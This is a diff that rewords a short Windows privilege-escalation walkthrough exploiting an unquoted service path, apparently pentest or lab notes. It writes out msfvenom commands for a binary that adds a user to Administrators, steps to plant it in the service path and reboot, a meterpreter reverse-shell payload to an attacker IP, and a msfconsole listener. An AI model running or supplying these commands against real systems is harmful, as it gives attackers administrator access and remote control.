 Skip to content

-1. let’s create a binary to Add a User to the Administrators with msfvenom.
+1. Create a binary to add a user to the Administrators group with msfvenom:

 msfvenom -p windows/x64/exec CMD='net localgroup Administrators [USERNAME] /add' -f exe > common.exe

-3. Move the binary to the path C:\Program Files\Unquoted Path Service
+3. Move the binary into the vulnerable path:

 move common.exe "C:\Program Files\Unquoted Path Service\"

-NOTE: If SeShutdownPrivilege is enabled you can reboot to have the service to restart automatically.
+Note: If SeShutdownPrivilege is enabled, you can reboot to restart the service automatically:

 shutdown /r /t 0

-1. let’s create a reverse shell binary with msfvenom.
+1. Create a reverse shell binary with msfvenom:

 msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=[ATTACKER-IP] LPORT=[PORT] -o unquotedpathservice.exe

-3. Copy your reverse shell executable to path and rename it to match the first valid segment of the service unquoted path:
+3. Copy the reverse shell to the vulnerable path and rename it to match the first valid segment of the unquoted path:

 copy C:\Temp\unquotedpathservice.exe "C:\Program Files\Unquoted Path Service\Common.exe"

-4. Start your listener on the attacking machine
+4. Start a listener on the attacker machine:

 msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"